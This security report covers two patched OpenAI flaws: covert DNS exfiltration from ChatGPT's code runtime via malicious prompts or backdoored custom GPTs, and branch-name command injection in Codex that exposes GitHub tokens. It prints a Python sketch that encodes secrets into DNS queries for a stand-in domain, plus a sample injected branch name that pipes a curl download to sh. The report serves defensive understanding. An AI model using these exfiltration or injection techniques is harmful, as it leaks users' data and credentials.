OpenAI Patch for ChatGPT Data Exfiltration and Codex Token Vulnerability

Overview

This report summarizes two security issues involving OpenAI products that were publicly described on March 30, 2026. The first issue concerned a previously unknown flaw in ChatGPT that researchers said could allow sensitive conversation content, including uploaded files and user messages, to be exfiltrated through a covert DNS-based channel originating from the Linux runtime used for code execution and data analysis. The second issue concerned a command injection vulnerability in OpenAI Codex that researchers said could expose GitHub tokens and enable unauthorized access to code repositories. According to the reporting, OpenAI patched the ChatGPT issue on February 20, 2026, and the Codex issue on February 5, 2026. The reporting also stated there was no evidence the ChatGPT flaw had been maliciously exploited.

Objective

The objective of this report is to document the nature of the vulnerabilities, describe their potential impact on users and organizations, and highlight the operational and security implications of relying on AI platforms that execute code or interact with external development environments. The findings are especially relevant for organizations using AI tools for data analysis, coding assistance, or custom GPT workflows.

Summary of Findings

The first finding involved ChatGPT’s execution environment. Researchers from Check Point said the issue bypassed visible guardrails by abusing a hidden DNS-based communication path in the Linux runtime. In practice, this meant a malicious prompt or a backdoored custom GPT could potentially encode and exfiltrate sensitive user content without triggering normal warnings about outbound data transfer. The same pathway could reportedly also be used to establish remote shell access inside the runtime and achieve command execution.
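To make the DNS exfiltration pathway concrete, the sketch below shows the general technique the researchers describe: arbitrary bytes are base32-encoded (DNS names are case-insensitive and restricted to a narrow character set) and split into subdomain labels of an attacker-controlled domain, so each DNS lookup carries a chunk of data to the attacker's authoritative nameserver even when HTTP egress is blocked. This is a minimal illustration of the generic technique, not the specific payload used against ChatGPT; the domain name is hypothetical and no lookups are actually performed.

```python
import base64

MAX_LABEL = 63  # DNS limits each label to 63 bytes

def encode_for_dns(secret: bytes, attacker_domain: str) -> list[str]:
    """Encode arbitrary bytes into DNS-safe query names.

    base32 is used because DNS names are case-insensitive and
    limited to letters, digits, and hyphens; padding is stripped
    and restored by the receiver from the label length.
    """
    encoded = base64.b32encode(secret).decode().rstrip("=").lower()
    labels = [encoded[i:i + MAX_LABEL]
              for i in range(0, len(encoded), MAX_LABEL)]
    # Each query "<chunk>.<attacker_domain>" is resolved by the
    # attacker's nameserver, which logs the chunks and reassembles them.
    return [f"{label}.{attacker_domain}" for label in labels]

queries = encode_for_dns(b"api_key=sk-123", "exfil.example.com")
```

Because the queries look like ordinary name resolution, they rarely trigger the outbound-transfer warnings that an HTTP upload would, which is exactly the visibility gap described above.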

The second finding involved OpenAI Codex. BeyondTrust researchers reported that the vulnerability stemmed from improper sanitization of GitHub branch names during task creation and execution. They said an attacker could inject commands through the branch name parameter, run malicious payloads inside the Codex container, and steal GitHub user access tokens. According to the report, the issue affected the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension.
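The class of fix for this kind of flaw is well understood: treat the branch name as untrusted input, validate it against an allowlist, and never interpolate it into a shell string. The sketch below illustrates that pattern under assumptions of my own; the regex is a simplified allowlist, not git's full ref-name grammar, and `checkout_branch` is a hypothetical helper, not Codex's actual code.

```python
import re
import subprocess

# Simplified allowlist (an assumption, not git's full ref-name rules):
# letters, digits, '.', '_', '/', '-'; must start with an alphanumeric.
BRANCH_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]*")

def is_safe_branch_name(branch: str) -> bool:
    """Accept the name only if it matches the allowlist exactly."""
    return BRANCH_RE.fullmatch(branch) is not None

def checkout_branch(branch: str) -> None:
    """Validate first, then invoke git with an argv list (no shell),
    so metacharacters in the name are never interpreted as commands."""
    if not is_safe_branch_name(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    subprocess.run(["git", "checkout", branch], check=True)
```

With this pattern, an injected name such as `main; curl http://evil.example/x | sh` is rejected at validation, and even a name that slipped through would reach git as a single literal argument rather than a shell command line.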

Risk Analysis

The ChatGPT issue is significant because it challenges the assumption that the AI runtime is isolated and that any outbound data transfer will be recognized and flagged by the platform. If that assumption is wrong, the user may not receive warnings or approval prompts before data leaves the environment. This creates a serious visibility gap for organizations that allow staff to upload internal documents, customer data, or proprietary material into AI tools.

The Codex issue is significant because AI coding agents often operate with powerful permissions across repositories and development workflows. If a malicious input can trigger command injection and token theft, the impact can extend beyond a single session into lateral movement, repository compromise, and broader software supply chain risk.

Conclusion

These issues show that AI platforms should be treated as high-value computing environments rather than simple chat interfaces. When AI systems can execute code, process files, or connect to developer tooling, their attack surface expands substantially. Even where vendor patches are applied quickly, the underlying lesson is that organizations should not assume native controls alone are enough.
